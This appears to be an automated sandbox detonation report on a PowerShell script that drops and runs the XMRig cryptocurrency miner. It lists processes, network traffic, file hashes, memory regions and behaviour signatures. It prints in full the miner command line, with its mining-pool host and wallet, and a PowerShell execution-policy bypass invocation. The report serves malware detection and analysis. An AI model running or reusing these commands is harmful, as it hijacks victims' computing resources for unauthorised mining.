"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3792 --field-trial-handle=2356,i,13261194862334667799,7441241219475888176,262144 --variations-seed-version /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=1388 --field-trial-handle=2356,i,13261194862334667799,7441241219475888176,262144 --variations-seed-version /prefetch:8
C:\Windows\system32\rundll32.exe
"C:\Windows\system32\rundll32.exe" "C:\Windows\SYSTEM32\EDGEHTML.dll",#141 Microsoft.VCLibs.140.00_8wekyb3d8bbwe
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k UnistackSvcGroup
Network
| Country | Destination | Domain | Proto |
| GB | 142.250.178.10:443 | tcp | |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.107.17.2.in-addr.arpa | udp |
| GB | 23.44.234.16:80 | tcp | |
| US | 8.8.8.8:53 | 23.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 13.107.253.64:443 | tcp | |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.94.73.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.142.211.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 144.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.73.42.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| BE | 23.55.97.181:80 | www.microsoft.com | tcp |
| US | 8.8.8.8:53 | 9.228.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 181.97.55.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.32.209.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 219.93.73.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 153.97.55.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 119.110.54.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 153.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 35.207.197.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.121.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.121.18.2.in-addr.arpa | udp |
Files
memory/4444-0-0x00007FFFA5283000-0x00007FFFA5285000-memory.dmp
memory/4444-1-0x00000232ACEF0000-0x00000232ACF12000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dwlsuo4k.mlm.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4444-11-0x00007FFFA5280000-0x00007FFFA5D41000-memory.dmp
memory/4444-12-0x00007FFFA5280000-0x00007FFFA5D41000-memory.dmp
memory/4444-13-0x00007FFFA5280000-0x00007FFFA5D41000-memory.dmp
memory/4444-14-0x00007FFFA5283000-0x00007FFFA5285000-memory.dmp
memory/4444-15-0x00007FFFA5280000-0x00007FFFA5D41000-memory.dmp
memory/4444-17-0x00000232C77E0000-0x00000232C77F2000-memory.dmp
memory/4444-18-0x00007FFFA5280000-0x00007FFFA5D41000-memory.dmp
memory/4444-19-0x00000232C5390000-0x00000232C539A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/3828-50-0x000002E2C7560000-0x000002E2C7580000-memory.dmp
memory/4444-51-0x00007FFFA5280000-0x00007FFFA5D41000-memory.dmp
memory/3828-52-0x000002E2C75B0000-0x000002E2C75D0000-memory.dmp
memory/3828-53-0x00007FF764E20000-0x00007FF765A53000-memory.dmp
memory/3828-54-0x00007FF764E20000-0x00007FF765A53000-memory.dmp
memory/3828-56-0x000002E2C8EB0000-0x000002E2C8ED0000-memory.dmp
memory/3828-55-0x000002E2C75D0000-0x000002E2C75F0000-memory.dmp
memory/3828-57-0x00007FF764E20000-0x00007FF765A53000-memory.dmp
memory/3828-58-0x00007FF764E20000-0x00007FF765A53000-memory.dmp
memory/3828-59-0x000002E2C75D0000-0x000002E2C75F0000-memory.dmp
memory/3828-60-0x000002E2C8EB0000-0x000002E2C8ED0000-memory.dmp
memory/3828-61-0x00007FF764E20000-0x00007FF765A53000-memory.dmp
memory/3828-62-0x00007FF764E20000-0x00007FF765A53000-memory.dmp
memory/3828-63-0x00007FF764E20000-0x00007FF765A53000-memory.dmp
memory/3828-64-0x00007FF764E20000-0x00007FF765A53000-memory.dmp
memory/3828-65-0x00007FF764E20000-0x00007FF765A53000-memory.dmp
memory/3828-66-0x00007FF764E20000-0x00007FF765A53000-memory.dmp
memory/3828-67-0x00007FF764E20000-0x00007FF765A53000-memory.dmp
memory/3828-68-0x00007FF764E20000-0x00007FF765A53000-memory.dmp
memory/3828-69-0x00007FF764E20000-0x00007FF765A53000-memory.dmp
memory/3828-70-0x00007FF764E20000-0x00007FF765A53000-memory.dmp
memory/3828-71-0x00007FF764E20000-0x00007FF765A53000-memory.dmp
memory/3828-72-0x00007FF764E20000-0x00007FF765A53000-memory.dmp
memory/3828-73-0x00007FF764E20000-0x00007FF765A53000-memory.dmp
memory/3828-74-0x00007FF764E20000-0x00007FF765A53000-memory.dmp
memory/3828-75-0x00007FF764E20000-0x00007FF765A53000-memory.dmp
memory/3828-76-0x00007FF764E20000-0x00007FF765A53000-memory.dmp
memory/3828-77-0x00007FF764E20000-0x00007FF765A53000-memory.dmp
memory/3828-78-0x00007FF764E20000-0x00007FF765A53000-memory.dmp
memory/3828-79-0x00007FF764E20000-0x00007FF765A53000-memory.dmp
memory/3828-80-0x00007FF764E20000-0x00007FF765A53000-memory.dmp
memory/3828-81-0x00007FF764E20000-0x00007FF765A53000-memory.dmp
memory/3828-82-0x00007FF764E20000-0x00007FF765A53000-memory.dmp
memory/3828-83-0x00007FF764E20000-0x00007FF765A53000-memory.dmp
memory/3828-84-0x00007FF764E20000-0x00007FF765A53000-memory.dmp
memory/3828-85-0x00007FF764E20000-0x00007FF765A53000-memory.dmp
memory/3828-86-0x00007FF764E20000-0x00007FF765A53000-memory.dmp
memory/3828-87-0x00007FF764E20000-0x00007FF765A53000-memory.dmp
memory/3828-88-0x00007FF764E20000-0x00007FF765A53000-memory.dmp
memory/3828-89-0x00007FF764E20000-0x00007FF765A53000-memory.dmp
memory/3828-90-0x00007FF764E20000-0x00007FF765A53000-memory.dmp
memory/3828-91-0x00007FF764E20000-0x00007FF765A53000-memory.dmp
memory/3828-92-0x00007FF764E20000-0x00007FF765A53000-memory.dmp
memory/3828-93-0x00007FF764E20000-0x00007FF765A53000-memory.dmp
memory/3828-94-0x00007FF764E20000-0x00007FF765A53000-memory.dmp
memory/3828-95-0x00007FF764E20000-0x00007FF765A53000-memory.dmp
memory/3828-96-0x00007FF764E20000-0x00007FF765A53000-memory.dmp
memory/3828-97-0x00007FF764E20000-0x00007FF765A53000-memory.dmp
memory/3828-98-0x00007FF764E20000-0x00007FF765A53000-memory.dmp
memory/3828-99-0x00007FF764E20000-0x00007FF765A53000-memory.dmp
memory/3828-100-0x00007FF764E20000-0x00007FF765A53000-memory.dmp
memory/3828-101-0x00007FF764E20000-0x00007FF765A53000-memory.dmp
memory/3828-102-0x00007FF764E20000-0x00007FF765A53000-memory.dmp
memory/3828-103-0x00007FF764E20000-0x00007FF765A53000-memory.dmp
memory/3828-104-0x00007FF764E20000-0x00007FF765A53000-memory.dmp
memory/3828-105-0x00007FF764E20000-0x00007FF765A53000-memory.dmp
memory/3828-106-0x00007FF764E20000-0x00007FF765A53000-memory.dmp
memory/3828-107-0x00007FF764E20000-0x00007FF765A53000-memory.dmp
memory/3828-108-0x00007FF764E20000-0x00007FF765A53000-memory.dmp
memory/3828-109-0x00007FF764E20000-0x00007FF765A53000-memory.dmp
memory/3828-110-0x00007FF764E20000-0x00007FF765A53000-memory.dmp
memory/3828-111-0x00007FF764E20000-0x00007FF765A53000-memory.dmp
memory/3828-112-0x00007FF764E20000-0x00007FF765A53000-memory.dmp
memory/3828-113-0x00007FF764E20000-0x00007FF765A53000-memory.dmp
memory/3828-114-0x00007FF764E20000-0x00007FF765A53000-memory.dmp
memory/3828-115-0x00007FF764E20000-0x00007FF765A53000-memory.dmp
memory/3828-116-0x00007FF764E20000-0x00007FF765A53000-memory.dmp
memory/3828-117-0x00007FF764E20000-0x00007FF765A53000-memory.dmp
memory/3828-118-0x00007FF764E20000-0x00007FF765A53000-memory.dmp
memory/3828-119-0x00007FF764E20000-0x00007FF765A53000-memory.dmp
Analysis: behavioral3
Detonation Overview
Submitted
2024-05-26 13:33
Reported
2024-05-27 04:25
Platform
win10v2004-20240508-en
Max time kernel
1789s
Max time network
1743s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4564 wrote to memory of 4796 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 4564 wrote to memory of 4796 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.142.211.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 140.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 144.107.17.2.in-addr.arpa | udp |
| US | 52.111.229.43:443 | tcp | |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 17.173.189.20.in-addr.arpa | udp |
Files
memory/4564-0-0x00007FFDCF643000-0x00007FFDCF645000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_nilecpw2.lhe.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4564-10-0x00000202B66A0000-0x00000202B66C2000-memory.dmp
memory/4564-11-0x00007FFDCF640000-0x00007FFDD0101000-memory.dmp
memory/4564-12-0x00007FFDCF640000-0x00007FFDD0101000-memory.dmp
memory/4564-14-0x00007FFDCF640000-0x00007FFDD0101000-memory.dmp
memory/4564-15-0x00000202B6A80000-0x00000202B6A92000-memory.dmp
memory/4564-16-0x00000202B6A70000-0x00000202B6A7A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/4796-47-0x000001A756B40000-0x000001A756B60000-memory.dmp
memory/4796-48-0x000001A756B80000-0x000001A756BA0000-memory.dmp
memory/4796-49-0x00007FF747260000-0x00007FF747E93000-memory.dmp
memory/4564-50-0x00007FFDCF640000-0x00007FFDD0101000-memory.dmp
memory/4564-51-0x00007FFDCF643000-0x00007FFDCF645000-memory.dmp
memory/4796-52-0x000001A7E9540000-0x000001A7E9560000-memory.dmp
memory/4796-53-0x000001A7E9770000-0x000001A7E9790000-memory.dmp
memory/4796-54-0x00007FF747260000-0x00007FF747E93000-memory.dmp
memory/4564-55-0x00007FFDCF640000-0x00007FFDD0101000-memory.dmp
memory/4796-56-0x00007FF747260000-0x00007FF747E93000-memory.dmp
memory/4796-58-0x000001A7E9540000-0x000001A7E9560000-memory.dmp
memory/4796-57-0x00007FF747260000-0x00007FF747E93000-memory.dmp
memory/4796-59-0x000001A7E9770000-0x000001A7E9790000-memory.dmp
memory/4796-60-0x00007FF747260000-0x00007FF747E93000-memory.dmp
memory/4796-61-0x00007FF747260000-0x00007FF747E93000-memory.dmp
memory/4796-62-0x00007FF747260000-0x00007FF747E93000-memory.dmp
memory/4796-63-0x00007FF747260000-0x00007FF747E93000-memory.dmp
memory/4796-64-0x00007FF747260000-0x00007FF747E93000-memory.dmp
memory/4796-65-0x00007FF747260000-0x00007FF747E93000-memory.dmp
memory/4796-66-0x00007FF747260000-0x00007FF747E93000-memory.dmp
memory/4796-67-0x00007FF747260000-0x00007FF747E93000-memory.dmp
memory/4796-68-0x00007FF747260000-0x00007FF747E93000-memory.dmp
memory/4796-69-0x00007FF747260000-0x00007FF747E93000-memory.dmp
memory/4796-70-0x00007FF747260000-0x00007FF747E93000-memory.dmp
memory/4796-71-0x00007FF747260000-0x00007FF747E93000-memory.dmp
memory/4796-72-0x00007FF747260000-0x00007FF747E93000-memory.dmp
memory/4796-73-0x00007FF747260000-0x00007FF747E93000-memory.dmp
memory/4796-74-0x00007FF747260000-0x00007FF747E93000-memory.dmp
memory/4796-75-0x00007FF747260000-0x00007FF747E93000-memory.dmp
memory/4796-76-0x00007FF747260000-0x00007FF747E93000-memory.dmp
memory/4796-77-0x00007FF747260000-0x00007FF747E93000-memory.dmp
memory/4796-78-0x00007FF747260000-0x00007FF747E93000-memory.dmp
memory/4796-79-0x00007FF747260000-0x00007FF747E93000-memory.dmp
memory/4796-80-0x00007FF747260000-0x00007FF747E93000-memory.dmp
memory/4796-81-0x00007FF747260000-0x00007FF747E93000-memory.dmp
memory/4796-82-0x00007FF747260000-0x00007FF747E93000-memory.dmp
memory/4796-83-0x00007FF747260000-0x00007FF747E93000-memory.dmp
memory/4796-84-0x00007FF747260000-0x00007FF747E93000-memory.dmp
memory/4796-85-0x00007FF747260000-0x00007FF747E93000-memory.dmp
memory/4796-86-0x00007FF747260000-0x00007FF747E93000-memory.dmp
memory/4796-87-0x00007FF747260000-0x00007FF747E93000-memory.dmp
memory/4796-88-0x00007FF747260000-0x00007FF747E93000-memory.dmp
memory/4796-89-0x00007FF747260000-0x00007FF747E93000-memory.dmp
memory/4796-90-0x00007FF747260000-0x00007FF747E93000-memory.dmp
memory/4796-91-0x00007FF747260000-0x00007FF747E93000-memory.dmp
memory/4796-92-0x00007FF747260000-0x00007FF747E93000-memory.dmp
memory/4796-93-0x00007FF747260000-0x00007FF747E93000-memory.dmp
memory/4796-94-0x00007FF747260000-0x00007FF747E93000-memory.dmp
memory/4796-95-0x00007FF747260000-0x00007FF747E93000-memory.dmp
memory/4796-96-0x00007FF747260000-0x00007FF747E93000-memory.dmp
memory/4796-97-0x00007FF747260000-0x00007FF747E93000-memory.dmp
memory/4796-98-0x00007FF747260000-0x00007FF747E93000-memory.dmp
memory/4796-99-0x00007FF747260000-0x00007FF747E93000-memory.dmp
memory/4796-100-0x00007FF747260000-0x00007FF747E93000-memory.dmp
memory/4796-101-0x00007FF747260000-0x00007FF747E93000-memory.dmp
memory/4796-102-0x00007FF747260000-0x00007FF747E93000-memory.dmp
memory/4796-103-0x00007FF747260000-0x00007FF747E93000-memory.dmp
memory/4796-104-0x00007FF747260000-0x00007FF747E93000-memory.dmp
memory/4796-105-0x00007FF747260000-0x00007FF747E93000-memory.dmp
memory/4796-106-0x00007FF747260000-0x00007FF747E93000-memory.dmp
memory/4796-107-0x00007FF747260000-0x00007FF747E93000-memory.dmp
memory/4796-108-0x00007FF747260000-0x00007FF747E93000-memory.dmp
memory/4796-109-0x00007FF747260000-0x00007FF747E93000-memory.dmp
memory/4796-110-0x00007FF747260000-0x00007FF747E93000-memory.dmp
memory/4796-111-0x00007FF747260000-0x00007FF747E93000-memory.dmp
memory/4796-112-0x00007FF747260000-0x00007FF747E93000-memory.dmp
memory/4796-113-0x00007FF747260000-0x00007FF747E93000-memory.dmp
memory/4796-114-0x00007FF747260000-0x00007FF747E93000-memory.dmp
memory/4796-115-0x00007FF747260000-0x00007FF747E93000-memory.dmp
memory/4796-116-0x00007FF747260000-0x00007FF747E93000-memory.dmp
memory/4796-117-0x00007FF747260000-0x00007FF747E93000-memory.dmp
memory/4796-118-0x00007FF747260000-0x00007FF747E93000-memory.dmp